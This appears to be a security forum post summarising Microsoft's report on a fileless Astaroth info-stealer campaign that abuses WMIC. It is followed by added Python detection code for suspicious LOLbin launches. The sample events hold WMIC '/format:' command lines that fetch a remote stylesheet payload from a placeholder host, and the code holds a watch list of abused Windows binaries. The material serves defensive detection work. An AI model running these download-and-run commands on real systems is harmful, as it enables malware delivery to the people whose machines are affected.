silversurfer
A fileless malware campaign used by attackers to drop the information stealing Astaroth Trojan into the memory of infected computers was detected by Microsoft Defender ATP Research Team researchers.
The Astaroth Trojan and information stealer is a malware strain capable of stealing sensitive information such as user credentials from its victims using a key logger module, operating system calls interception, and clipboard monitoring.
Astaroth is also known for abusing living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to stealthily download and install malware payloads in the background.
We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf
— Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019
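Added example (not from the post or from Microsoft): a small detection routine for the LOLbin behaviour described above. It scans constructed Sysmon-style process-creation events and flags WMIC launches whose command line points at a remote URL, including the documented wmic /format: remote-stylesheet case; the extra binary names in the watch list and the sample events are assumptions, not data from the post.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"https://example.invalid/x.xsl"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic logicaldisk get name,size"},   # benign admin use
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process get /format:http://example.invalid/payload.xsl"},
]

# Signed Windows binaries commonly abused to fetch or run payloads (assumed list).
LOLBIN_NAMES = {"wmic.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
FORMAT_RE = re.compile(r"/format\s*:", re.IGNORECASE)

@dataclass
class Finding:
    image: str
    command_line: str
    reasons: list

def assess_event(event):
    """Return a Finding for a suspicious LOLbin launch, or None if nothing stands out."""
    image_name = event["Image"].rsplit("\\", 1)[-1].lower()
    if image_name not in LOLBIN_NAMES:
        return None
    cmd = event.get("CommandLine", "")
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL on LOLbin command line")
    # wmic's /format: switch accepts a URL to an XSL stylesheet, a known download-and-run path.
    if image_name == "wmic.exe" and FORMAT_RE.search(cmd) and URL_RE.search(cmd):
        reasons.append("wmic /format pointed at a remote stylesheet")
    return Finding(event["Image"], cmd, reasons) if reasons else None

def scan(events):
    """Run assess_event over a list of events and keep only the hits."""
    return [f for f in (assess_event(e) for e in events) if f]
```

Benign WMIC queries without a URL pass through untouched, so the rule keys on the download behaviour rather than on the presence of wmic.exe itself.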